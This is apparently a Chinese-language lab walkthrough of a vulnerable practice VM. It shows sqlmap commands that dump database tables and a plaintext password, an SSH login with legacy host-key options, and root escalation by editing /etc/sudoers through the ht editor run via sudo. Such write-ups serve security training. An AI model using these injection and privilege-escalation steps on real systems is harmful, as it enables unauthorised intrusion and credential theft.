ip地址扫描
端口扫描
访问80端口
点击login
发现为LotusCMS
发现url上有id=1,在1后加’ 测试sql注入
发现可能存在sql注入
sqlmap测试
sqlmap -u "http://192.168.237.131/gallery/gallery.php?sort=dateuploaded&id=1%E2%80%99" --batch
存在sql注入
sqlmap -u "http://192.168.237.131/gallery/gallery.php?sort=dateuploaded&id=1%E2%80%99" --current-db --batch
查询数据库名
sqlmap -u "http://192.168.237.131/gallery/gallery.php?sort=dateuploaded&id=1%E2%80%99" -D gallery --tables --batch
查询表名
sqlmap -u "http://192.168.237.131/gallery/gallery.php?sort=dateuploaded&id=1%E2%80%99" -D gallery -T dev_accounts --dump --batch
查看dev_accounts表
-u
查看gallarific_users表
发现账户名:admin 密码:n0t7t1k4
发现用户名和密码
尝试通过用户名和密码进行登录,发现密码不正确
尝试ssh连接
连接失败,因为openssh 7.0之后的版本不支持ssh-dss(DSA)算法
查看ssh版本:ssh -V
解决办法
在每次指令之后加上-oHostKeyAlgorithms=+ssh-dss
或者-oHostKeyAlgorithms=+ssh-dsa: ssh -oHostKeyAlgorithms=+ssh-dsa root@192.168.0.102
利用ssh连接
发现dreg没有sudo 权限
切换loneferret用户
执行sudo -l 查看
进行提权
查看loneferret家目录的信息
查找SUID可执行文件
发现存在/user/local/bin/ht
发现<font style="color:rgb(21, 167, 167);">ht编辑器</font>
。<font style="color:rgb(21, 167, 167);">sudo -l</font>
发现该编辑器被分配root权限。如果编辑/etc/sudoers,权限添加/bin/bash,可以直接拿root的shell了。
执行sudo /usr/local/bin/ht
//报错Error opening terminal: xterm-256color.则 export TERM=xterm //ht编辑器修改/etc/sudoers
执行sodo /bin/bash 提权成功